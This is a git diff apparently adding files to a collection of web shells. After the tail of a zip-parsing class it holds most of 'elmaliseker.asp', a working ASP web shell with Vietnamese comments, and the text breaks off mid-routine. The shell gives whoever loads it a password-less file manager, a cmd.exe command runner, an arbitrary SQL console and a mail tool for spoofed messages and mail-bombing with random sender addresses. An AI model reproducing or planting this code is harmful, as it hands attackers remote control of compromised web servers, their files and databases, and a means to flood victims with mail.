+If InStr(1, lstrPath, "\") = "0" Then
+Name = lstrPath
+Exit Property
+End If
+Name = Mid(lstrPath, InStrRev(lstrPath, "\") + 1)
+End Property
+
+Public Property Get Path
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Path = ""
+Exit Property
+End If
+Path = Mid(lstrPath, 1, InStrRev(lstrPath, "\"))
+End Property
+
+Public Property Get Packed
+Packed = CompressedSize
+End Property
+
+Public Property Get Ratio
+If UncompressedSize = 0 Then Exit Property
+If CompressedSize >= UncompressedSize Then
+Ratio = "0%"
+Else
+Ratio = FormatNumber(((1 - (CompressedSize / UncompressedSize)) * 100), 0, True, False, True) & "%"
+End If
+End Property
+
+Public Property Get Modified()
+Modified = CDate(GetDate(LastModifiedDate) & " " & GetTime(LastModifiedTime))
+End Property
+
+Private Function GetDate(plngDate)
+GetDate = DateSerial(1980 + (plngDate And &HFE00) \ &H200, _
+(plngDate And &H1E0) \ &H20, plngDate And &H1F)
+End Function
+
+Private Function GetTime(plngDate)
+GetTime = TimeSerial((plngDate And &HF800) \ &H800, _
+(plngDate And &H7E0) \ &H20, _
+(plngDate And &H1F) * 2)
+End Function
+
+Public Property Get Size()
+Size = UncompressedSize
+End Property
+
+Public Property Get BitMask()
+Dim llngNumber
+Dim lstrBits
+llngNumber = GeneralPurposeFlags
+Do
+If llngNumber Mod 2 = 1 Then lstrBits = "1" & lstrBits Else lstrBits = "0" & lstrBits
+llngNumber = llngNumber \ 2
+Loop Until llngNumber = 0
+lstrBits = Right("0000000000000000" & lstrBits, 16)
+For llngNumber = 0 To 3
+lstrReturn = lstrReturn & Mid(lstrBits, (llngNumber * 4) + 1, 4) & "."
+Next
+BitMask = Left(lstrReturn, 19)
+End Property
+
+Property Get CompressionMethodString()
+Select Case CompressionMethod
+Case 0 CompressionMethodString = "The file is stored (no compression)"
+Case 1 CompressionMethodString = "The file is Shrunk"
+Case 2 CompressionMethodString = "The file is Reduced with compression factor 1"
+Case 3 CompressionMethodString = "The file is Reduced with compression factor 2"
+Case 4 CompressionMethodString = "The file is Reduced with compression factor 3"
+Case 5 CompressionMethodString = "The file is Reduced with compression factor 4"
+Case 6 CompressionMethodString = "The file is Imploded"
+Case 7 CompressionMethodString = "Reserved for Tokenizing compression algorithm"
+Case 8 CompressionMethodString = "The file is Deflated"
+Case 9 CompressionMethodString = "Reserved for enhanced Deflating"
+Case 10 CompressionMethodString = "PKWARE Date Compression Library Imploding"
+Case Else CompressionMethodString = "Unhandled Copression type: " & CompressionMethod
+End Select
+End Property
+End Class
+%>
\ No newline at end of file
diff --git a/138shell/E/elmaliseker.asp.txt b/138shell/E/elmaliseker.asp.txt
new file mode 100644
index 0000000..26765f8
--- /dev/null
+++ b/138shell/E/elmaliseker.asp.txt
@@ -0,0 +1,2324 @@
+<%
+
+' Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)
+' Email : forever5pi@yahoo.com
+' Website: http://vnhacker.org
+
+option explicit
+
+Server.ScriptTimeout=10000
+Response.Buffer=false
+
+dim gURL,gMsg
+dim targetPath,cp_dst,mv_dst,root
+dim FSO,re
+dim zombie_array,special_array
+
+' ###################################### CONFIGURATION ######################################
+
+const gPassword="" ' mat khau ("" : khong dung password)
+
+const gMax=50 ' chieu dai toi da cho ten file
+const gBomb=1000 ' so luong mail mac dinh can bomb
+
+const lnkExt="lnk,url"
+const editExt="htm,html,asp,asa,txt,inc,css,aspx,js,vbs,shtm,shtml,xml,xsl,log,ini,bat,bak" ' danh sach cac file cho phep edit
+
+const TmpDir="C:\" ' thu muc tam thoi mac dinh
+const Shell="cmd.exe" ' shell mac dinh
+
+' cac chuoi ket noi mac dinh
+const cstrMSSQL = "Provider=SQLOLEDB;Data Source=SERVER_NAME;database=DB_NAME;uid=UID;pwd=PWD"
+const cstrJET = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=full_path/db_file.mdb" 
+const cstrACCESS = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=full_path/db_file.mdb"
+const cstrORACLE = "Provider=OraOLEDB.Oracle.1; Data Source=DB_NAME; User ID=UID; Password=PWD"
+const cstrMYSQL = "Driver=MySQL;server=SERVER_IP;uid=UID;pwd=PWD;database=DB_NAME"
+const cstrDSN = "DSN_NAME"
+
+const bSize=false' co/khong hien folder-size
+
+const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-" ' tap ki thu dung de sinh chuoi ngau nhien
+
+zombie_array=array("com","net","org","info","vn","cn") ' mang cac domain z0mbie
+special_array=array("yahoo.com","hotmail.com") ' mang cac domain dac biet (dung trong bomb mail)
+
+root=Server.MapPath(".") ' folder mac dinh
+
+' ###########################################################################################
+
+gURL=Request.ServerVariables("SCRIPT_NAME")
+Init()
+if (LCase(Left(Request.ServerVariables("HTTP_CONTENT_TYPE"),19))="multipart/form-data") and (Session("allow")=1) and (Session("mode")=0) then Upload()
+Secure()
+if Request.Form("command")="Logout" then Logout()
+if Request.Form("command")="ChangeMode" then
+Session("mode")=Request.Form("mode")
+Session("switch")=true
+end if
+select case Session("mode")
+case 0 myFile()
+case 1 myCMD()
+case 2 mySQL()
+case 3 myMail()
+end select
+
+'###########################################################################################
+
+sub myFile()
+if Session("switch")=true then
+targetPath=Session("targetPath")
+if targetPath="" then targetPath=root
+Session("switch")=false
+else
+targetPath=Trim(Request.Form("folder"))
+if targetPath="" then targetPath=root else targetPath=abspath(targetPath)
+
+select case Request.Form("command")
+case "Download"
+Download()
+exit sub
+case "Edit"
+Editor()
+exit sub
+case "ChangeAttributesFile","ChangeAttributesFolder"
+ChangeAttributesItem()
+exit sub
+case "Tree"
+Tree()
+exit sub
+case "Delete" Delete()
+case "Move" Move()
+case "Copy" Copy()
+case "ZipInfo" ZipInfo()
+case "NewFile","NewFolder" CreateItem()
+case "RenameFile","RenameFolder" RenameItem()
+case "OpenFolder" OpenFolder()
+case "LevelUp" targetPath=FSO.GetParentFolderName(abspath(Request.Form("folder")))
+case "LevelRoot" targetPath=findroot(abspath(Request.Form("folder")))
+end select
+
+Session("targetPath")=targetPath
+end if
+
+HtmlHeader("")
+HtmlMode()
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub myCMD()
+dim bDoIt
+dim bEcho
+dim szTmpDir,szShell,szCmd,szTmpFile
+dim oScript,oScriptNet,oFile
+
+HtmlHeader("")
+HtmlMode()
+
+set oScript=Server.CreateObject("Wscript.Shell")
+set oScriptNet=Server.CreateObject("Wscript.Network")
+
+szTmpDir=Trim(Request.Form("tmpdir"))
+szShell=Trim(Request.Form("shell"))
+szCmd=Trim(Request.Form("cmd"))
+bEcho=CBool(Request.Form("echo"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoit=false
+szTmpDir=Session("szTmpDir")
+szShell=Session("szShell")
+szCmd=Session("szCmd")
+bEcho=Session("bEcho")
+else
+bDoIt=true
+end if
+
+if szTmpDir="" then szTmpDir=TmpDir else szTmpDir=abspath(szTmpDir)
+if szShell="" then szShell=Shell
+
+Session("szTmpDir")=szTmpDir
+Session("szShell")=szShell
+Session("szCmd")=szCmd
+Session("bEcho")=bEcho
+
+%>
+<form name=frmCMD method=post action="<%=gURL%>">
+<table>
+<tr><td><b>T</b>mpDir:</td><td><input type=text name=tmpdir value="<%=Server.HtmlEncode(szTmpDir)%>" size=20></td></tr>
+<tr><td><b>S</b>hell:</td><td><input type=text name=shell value="<%=Server.HtmlEncode(szShell)%>" size=20></td></tr>
+<tr><td><b>C</b>md:</td><td><input type=text name=cmd value="<%=Server.HtmlEncode(szCmd)%>" size=80> <input type=submit value=Go></td></tr>
+<tr><td><b>E</b>cho:</td><td><input type=checkbox name=echo value=1<%if bEcho then Response.Write " checked"%>></td></tr>
+</table>
+</form>
+<script>frmCMD.cmd.focus()</script>
+<%
+if (szCmd<>"") and (bDoIt=true) then
+if bEcho then
+call oScript.Run(szShell & " /c " & szCmd)
+else
+szTmpFile = addslash(szTmpDir) & FSO.GetTempName
+call oScript.Run(szShell & " /c " & szCmd & " > " & szTmpFile, 0, true)
+if FSO.FileExists(szTmpFile) then set oFile=FSO.OpenTextFile (szTmpFile, 1, false, 0)
+end if
+end if
+%>
+<p><%=FormatDate(Now)%>
+<p><b>I</b>P: <%=Request.ServerVariables("LOCAL_ADDR")%><br>
+<b>U</b>ser: \\<%=oScriptNet.ComputerName%>\\<%=oScriptNet.UserName%>
+<%
+if (IsObject(oFile)) then
+on error resume next
+%>
+<pre>
+<%=Server.HtmlEncode(oFile.ReadAll)%>
+</pre>
+<%
+oFile.Close
+call FSO.DeleteFile(szTmpFile, true)
+end if
+
+set oScript=nothing
+set oScriptNet=nothing
+
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub mySQL()
+dim szConn,szSQL1,szSQL2,szSQL,bDoIt
+dim intChoice
+
+HtmlHeader("")
+HtmlMode()
+
+szConn=Trim(Request.Form("conn"))
+szSQL1=Trim(Request.Form("sql1"))
+szSQL2=Trim(Request.Form("sql2"))
+intChoice=CInt(Request.Form("choice"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+szConn=Session("szConn")
+szSQL1=Session("szSQL1")
+szSQL2=Session("szSQL2")
+intChoice=Session("intChoice")
+else
+bDoIt=true
+end if
+
+if intChoice=0 then intChoice=1
+if intChoice=1 then szSQL=szSQL1 else szSQL=szSQL2
+
+Session("szConn")=szConn
+Session("szSQL1")=szSQL1
+Session("szSQL2")=szSQL2
+Session("intChoice")=intChoice
+
+select case trim(ucase(szConn))
+case "MSSQL" 
+szConn=cstrMSSQL
+szSQL=""
+case "JET"
+szConn=cstrJET
+szSQL=""
+case "ACCESS"
+szConn=cstrACCESS
+szSQL=""
+case "ORACLE"
+szConn=cstrORACLE
+szSQL=""
+case "MYSQL"
+szConn=cstrMYSQL
+szSQL=""
+case "DSN"
+szConn=cstrDSN
+szSQL=""
+end select
+%>
+<input type=button value="<->" onclick="changeInput()">
+<form name=frmSQL method=post action="<%=gURL%>">
+<input type=hidden name=choice value="<%=intChoice%>">
+<b>C</b>onn: <input type=text name=conn value="<%=Server.HtmlEncode(szConn)%>" size=90> <br>
+<b>S</b>QL:  <span id=s1<%if intChoice=2 then Response.Write " style=""display:none"""%>><input type=text name=sql1 value="<%=Server.HtmlEncode(szSQL1)%>" size=90></span>
+<span id=s2<%if intChoice=1 then Response.Write " style=""display:none"""%>>( [F9] = Go )<br><textarea name=sql2 cols=42 rows=12 onkeydown="if (event.keyCode==120) frmSQL.submit();"><%=Server.HtmlEncode(szSQL2)%></textarea><br></span>
+<input type=submit value=Go>
+</table>
+</form>
+<script>
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+function changeInput() {
+if (s1.style.display=='none') {
+s1.style.display='inline';
+s2.style.display='none';
+frmSQL.choice.value="1";
+frmSQL.sql1.focus();
+} else {
+s1.style.display='none';
+s2.style.display='inline';
+frmSQL.choice.value="2";
+frmSQL.sql2.focus();
+}
+}
+</script>
+<%
+if (szConn<>"") and (szSQL<>"") and (bDoIt=true) then
+dim adoCon, rS
+dim i,intAffected
+
+set adoCon=Server.CreateObject("ADODB.Connection")
+adoCon.Open szConn
+set rS=adoCon.Execute(szSQL, intAffected)
+if (rS.Fields.Count>0) then
+' hien thi ten cua cac truong
+Response.Write "<table border=1>" & vbNewLine & "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt><b>"
+if (rS.Fields(i).Name="") then
+Response.Write "(No column name)"
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Name)
+end if
+Response.Write "</b></tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+' hien thi du lieu tren cac dong
+on error resume next
+rS.MoveFirst
+do while not rS.EOF
+Response.Write "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt>"
+if IsNull(rs.Fields(i).Value) then
+Response.Write "NULL"
+elseif (Trim(rs.Fields(i).Value)="") then
+Response.Write " "
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Value)
+end if
+Response.Write "</tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+rS.MoveNext
+loop
+rS.Close
+Response.Write "</table>" & vbNewLine
+end if
+
+Response.Write "<p><tt>(" & intAffected & " row(s) affected)</tt>"
+
+set rS=nothing
+set adoCon=nothing
+end if
+
+HtmlFooter()
+Destroy()
+end sub
+
+
+'###########################################################################################
+
+sub myMail()
+dim strFrom,strTo,strSubject,strBody,bHtml,intNumber,i,StartTime,EndTime,bDoIt
+dim objMail,objMsg
+
+strTo=Trim(Request.Form("to"))
+
+select case Request.Form("subcommand")
+case "Send"
+strFrom=Trim(Request.Form("from"))
+strSubject=Trim(Request.Form("subject"))
+strBody=Request.Form("body")
+bHtml=CBool(Request.Form("html"))
+case "Bomb"
+if IsNumeric(Request.Form("number")) then intNumber=Int(Request.Form("number"))
+strFrom=Session("strFrom")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+end select
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+strFrom=Session("strFrom")
+strTo=Session("strTo")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+intNumber=Session("intNumber")
+else
+bDoIt=true
+end if
+
+if (intNumber<=0) then intNumber=gBomb
+
+Session("strFrom")=strFrom
+Session("strTo")=strTo
+Session("strSubject")=strSubject
+Session("strBody")=strBody
+Session("bHtml")=bHtml
+Session("intNumber")=intNumber
+
+HtmlHeader("")
+HtmlMode()
+
+if bDoIt then
+select case Request.Form("subcommand")
+case "Send"
+if IsValidEmail(strTo) then
+set objMail=Server.CreateObject("CDONTS.NewMail")
+objMail.To=strTo
+objMail.From=strFrom
+objMail.Subject=strSubject
+objMail.Body=strBody
+if bHtml then
+objMail.BodyFormat=0 'HTML
+objMail.MailFormat=0 'MIME
+end if
+objMail.Send
+set objMail=nothing
+Response.Write "<b>M</b>essage was sent to " & strTo & " successfully." & vbNewLine
+end if
+case "Bomb"
+if IsValidEmail(strTo) then
+Response.Write "<b>B</b>ombing " & Replace(FormatNumber(intNumber,0),",",".") & " mail"
+if intNumber>1 then Response.Write "s"
+Response.Write " to " & strTo & " ... "
+StartTime=Timer
+set objMsg=Server.CreateObject("CDO.Message")
+objMsg.To=strTo
+Randomize
+for i=1 to intNumber
+objMsg.From=makeEmail()
+objMsg.Subject=makeText(Int((50-25+1)*Rnd+25))
+objMsg.TextBody=makeText(Int((100-50+1)*Rnd+50))
+objMsg.Send
+next
+set objMsg=nothing
+EndTime=Timer
+Response.Write howlong(EndTime-StartTime) & vbNewLine
+end if
+end select
+end if
+%>
+<p>
+<table border=1>
+<tr>
+<td width=50%>
+<form name=frmSend method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>a) <b>A</b>nonymous Mail</td>
+</tr>
+<tr>
+<td><b>F</b>rom:</td>
+<td><input type=text name=from value="<%=Server.HtmlEncode(strFrom)%>" size=25></td>
+</tr>
+<tr>
+<td><b>T</b>o:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>S</b>ubject:</td>
+<td><input type=text name=subject value="<%=Server.HtmlEncode(strSubject)%>" size=50></td>
+</tr>
+<tr>
+<td valign=top><b>B</b>ody:</td>
+<td><textarea name=body cols=37 rows=12><%=Server.HtmlEncode(strBody)%></textarea></td>
+</tr>
+<tr>
+<td><b>H</b>tml:</td>
+<td><input type=checkbox name=html value=1<%if bHtml=true then Response.Write " checked"%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Send></td>
+</tr>
+</table>
+</form>
+</td>
+<td width=50% valign=top>
+<form name=frmBomb method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>b) <b>B</b>omb Mail</td>
+</tr>
+<tr>
+<td><b>A</b>ddress:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>N</b>umber:</td>
+<td><input type=text name=number value=<%=intNumber%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Bomb></td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+function IsValidEmail(strEAddress)
+dim objRegExpr
+set objRegExpr = New RegExp
+objRegExpr.Pattern = "^[a-zA-Z0-9][\w\.-]*[a-zA-Z0-9]@[\w-\.]*[a-zA-Z0-9]\.[a-zA-Z]{2,7}$"
+objRegExpr.Global = true
+objRegExpr.IgnoreCase = False
+IsValidEmail = objRegExpr.Test(strEAddress)
+set objRegExpr = nothing
+end function
+
+'###########################################################################################
+
+function makeEmail()
+Randomize
+if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "." & zombie_array(Int((UBound(zombie_array)-0+1)*Rnd+0)) else makeEmail=makeText(8) & "@" & special_array(Int((UBound(special_array)-0+1)*Rnd+0))
+end function
+
+'###########################################################################################
+
+function makeText(intLen)
+dim strNewText,i
+strNewText=""
+Randomize
+for i=1 to intLen
+strNewText=strNewText & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
+next
+makeText=strNewText
+end function
+
+'###########################################################################################
+
+function howlong(intTime)
+if (intTime<60) then
+howlong=intTime & " second(s)"
+elseif (intTime<60*60) then
+howlong=FormatNumber(intTime/60,2) & " minute(s)"
+else
+howlong=FormatNumber(intTime/(60*60),2) & " hour(s)"
+end if
+end function
+
+'###########################################################################################
+
+sub Tree()
+dim path
+path=abspath(Request.Form("param"))
+if FSO.FolderExists(path) then
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<%
+tree_dir(path)
+%>
+</body>
+</html>
+<%
+else
+%>
+<script>alert('Folder not found !');window.close();</script>
+<%
+end if
+Destroy()
+end sub
+
+sub tree_dir(path)
+dim strAttrib,strSize
+
+on error resume next
+
+dim oFolder
+dim oSubFolders,oSubFolder
+dim oFiles,oFile
+dim oSubFolders2,oSubFolder2
+dim oFiles2,oFile2
+
+set oFolder=FSO.GetFolder(path)
+set oSubFolders=oFolder.SubFolders
+set oFiles=oFolder.Files
+
+Response.Write "<p>" & FSO.GetAbsolutePathName(path)
+
+strAttrib=GetAttributes(oFolder.Attributes)
+
+if strAttrib<>" " then Response.Write " (" & GetAttributes(oFolder.Attributes) & ")"
+
+Response.Write vbNewLine
+
+if (oSubFolders.Count>0) or (oFiles.Count>0) then
+%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Type</font></td>
+<td align=center><font color=#FFFF00>Modified</font></td>
+<td align=center><font color=#FFFF00>Attributes</font></td>
+</tr>
+<%
+' liet ke thu muc
+for each oSubFolder in oSubFolders
+%>
+<tr bgcolor=#000000>
+<td><%=oSubFolder.Name%></td>
+<td align=right> </td>
+<td align=center>DIR</td>
+<td align=center><%=FormatDate(oSubFolder.DateLastModified)%></td>
+<td><%=GetAttributes(oSubFolder.Attributes)%></td>
+</tr>
+<%
+next
+
+' liet ke file
+for each oFile in oFiles
+%>
+<tr bgcolor=#000000>
+<td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetExtensionName(path & "\" & oFile.Name)="url") then Response.Write " title=""" & FindLink(path & "\" & oFile.Name) & """"%>><%=oFile.Name%></td>
+<td align=right><%=FormatSize(oFile.Size)%></td>
+<td align=center><%=oFile.Type%></td>
+<td align=center><%=FormatDate(oFile.DateLastModified)%></td>
+<td><%=GetAttributes(oFile.Attributes)%></td>
+</tr>
+<%
+next
+strSize=FormatSize(oFolder.Size)
+%>
+<tr bgcolor=#000000>
+<td colspan=5 align=center><%=oSubFolders.Count%> folder(s), <%=oFiles.Count%> file(s)<%if strSize<>"" then Response.Write " (" & strSize & ")"%></td>
+</tr>
+</table>
+<%
+' goi de qui
+for each oSubFolder in oSubFolders
+set oSubFolder2=oSubFolder.SubFolders
+set oFile2=oSubFolder.Files
+
+if (oSubFolder2.Count>0) or (oFile2.Count>0) then
+tree_dir(oSubFolder.ParentFolder & "\" & oSubFolder.Name)
+end if
+
+set oSubFolder2=nothing
+set oFile2=nothing
+next
+end if
+
+set oSubFolder=nothing
+set oFiles=nothing
+set oFolder=nothing
+end sub
+
+'###########################################################################################
+
+sub Editor()
+dim f,name,path
+
+on error resume next
+
+HtmlHeader("")
+
+name=Request.Form("param")
+path=addslash(targetPath) & name
+
+select case Request.Form("subcommand")
+case "Save","SaveAs"
+set f=FSO.OpenTextFile(path,2,true,-2)
+if Err.Number<>0 then
+gMsg="Can not write to the file """ & name & """, permission denied!"
+Err.Clear
+else
+f.Write Request.Form("content")
+end if
+set f=nothing
+set f=FSO.OpenTextFile(path,1,false,-2)
+case else
+if not FSO.FileExists(path) then
+gMsg="The file """ & name & """ does not exist"
+set f=FSO.CreateTextFile(path,false)
+if Err.Number<>0 then
+gMsg=gMsg & ", also unable to create new file."
+Err.Clear
+else
+gMsg=gMsg & ", created new file."
+end if
+else
+set f=FSO.OpenTextFile(path,1,false,-2)
+if Err.Number<>0 then
+gMsg="Can not read from the file """ & name & """, permission denied!"
+Err.Clear
+end if
+end if
+end select
+%>
+<% if gMsg<>"" then Response.Write "<script>alert('" & gMsg & "')</script>" & vbNewLine %>
+<p><b>E</b>diting - "<%=path%>"<br>
+<form name=frmFile method=post action="<%=gURL%>">
+<b>W</b>rap<input type=checkbox id=wrap onclick="EditorCommand('WordWrap')">
+<center>
+<table width=100%>
+<tr><td align=center>
+<textarea name=content rows=25 cols=46 style="width:580;height:330" wrap=off><%=Server.HTMLEncode(f.ReadAll)%></textarea>
+</td></tr>
+<tr><td align=center>
+<input type=button value=Save onclick="EditorCommand('Save')"> <input type=button value="Save As" onclick="EditorCommand('SaveAs')"> <input type=button value=Reload onclick="EditorCommand('Reload')"> <input type=button value=Close onclick="window.close()">
+</td></tr>
+</table>
+</center>
+<script>frmFile.content.focus()</script>
+<input type=hidden name=command value=Edit>
+<input type=hidden name=subcommand value="">
+<input type=hidden name=param value="<%=name%>">
+<input type=hidden name=folder value="<%=Request.Form("folder")%>">
+</form>
+<%
+set f=nothing
+HtmlJsEditor()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub ChangeAttributesItem()
+dim item,itemType,itemName,itemPath,itemAttrib
+
+itemType=Request.Form("command")
+itemName=Request.Form("param")
+itemPath=addslash(targetPath) & itemName
+
+HtmlHeader("")
+
+select case itemType
+case "ChangeAttributesFile" set item=FSO.GetFile(itemPath)
+case "ChangeAttributesFolder" set item=FSO.GetFolder(itemPath)
+end select
+
+if Request.Form("subcommand")="change" then
+itemAttrib=int(Request.Form("r"))
+itemAttrib=itemAttrib+int(Request.Form("h"))
+itemAttrib=itemAttrib+int(Request.Form("a"))
+itemAttrib=itemAttrib+int(Request.Form("s"))
+on error resume next
+item.Attributes=int(itemAttrib)
+if Err.Number<>0 then Response.Write "<script>alert('Permission denined')</script>" & vbNewLine
+end if
+
+itemAttrib=item.Attributes
+%>
+<b>C</b>hange attributes - "<%=itemName%>"
+<p align=center>
+<form name=frmAttrib method=post action="<%=gURL%>">
+<input type=hidden name=command value="<%=itemType%>">
+<input type=hidden name=subcommand value=change>
+<input type=hidden name=folder value="<%=targetPath%>">
+<input type=hidden name=param value="<%=itemName%>">
+<table>
+<tr>
+<td><input type=checkbox name=r value=1 <%if (itemAttrib and 1)>0 then Response.Write " checked"%>>Read-only</td>
+<td><input type=checkbox name=h value=2 <%if (itemAttrib and 2)>0 then Response.Write " checked"%>>Hidden</td>
+</tr>
+<tr>
+<td><input type=checkbox name=a value=32 <%if (itemAttrib and 32)>0 then Response.Write " checked"%>>Archive</td>
+<td><input type=checkbox name=s value=4 <%if (itemAttrib and 4)>0 then Response.Write " checked"%>>System</td>
+</tr>
+</table><br>
+<input type=button value=OK onclick="frmAttrib.submit()"> <input type=button value=Close onclick="window.close()">
+</form>
+</p>
+<%
+set itemType=nothing
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub OpenFolder()
+if Trim(Request.Form("folder"))="" then 
+if Trim(Request.Form("param"))="" then targetPath=root else targetPath=abspath(Trim(Request.Form("param")))
+else
+targetPath=addslash(Trim(Request.Form("folder"))) & Trim(Request.Form("param"))
+end if
+end sub
+
+'###########################################################################################
+
+sub CreateItem()
+dim itemType,itemName,itemPath 
+itemType=request.form("command")
+itemName=request.form("param")
+itemPath=addslash(targetPath) & itemName
+
+on error resume next
+
+select case itemType
+case "NewFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateFolder(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the folder """ & itemName & """, an error occured..."
+else
+gMsg="Created the folder """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the folder """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+case "NewFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateTextFile(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the file """ & itemName & """, an error occured..."
+else
+gMsg="Created the file """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the file """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+end select
+end sub
+
+'###########################################################################################
+
+sub ZipInfo()
+dim path,zip,zipfile,i
+
+path=addslash(targetPath) & Request.Form("param")
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<p><%=path%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Ratio</font></td>
+<td align=center><font color=#FFFF00>Packed</font></td>
+<td align=center><font color=#FFFF00>Modify</font></td>
+<td align=center><font color=#FFFF00>Path</font></td>
+</tr>
+<%
+set zip=new clszip
+zip.ZipLoad(path)
+set zipfile=new clsZipFile
+
+for i=1 to zip.FileCount
+set zipfile=zip.GetFile(i)
+with zipfile
+if not (.IsFolder Or .IsOverall) then
+Response.Write "<tr bgcolor=#000000>" & vbNewLine
+Response.Write " <td>" & .Name & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Size,0) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & .Ratio & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Packed,0) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(.Modified) & "</td>" & vbNewLine
+Response.Write " <td>" & .Path & "</td>" & vbNewLine
+end if
+end with
+next
+
+set ZipFile=nothing
+set zip=nothing
+%>
+</table>
+</p>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Delete()
+dim i,ndir,nfile,itemName,itemPath
+
+on error resume next
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>D</b>elete folder(s)..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFolder itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>D</b>elete file(s)..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFile itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Copy()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+cp_dst=Trim(Request.Form("cp"))
+if cp_dst="" then exit sub
+cp_dst=abspath(cp_dst)
+Session("cp_dst")=cp_dst
+
+if FSO.FolderExists(cp_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>C</b>opying folder(s) to """ & cp_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFolder itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>C</b>opying file(s) to """ & cp_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFile itemPath,addslash(cp_dst),true
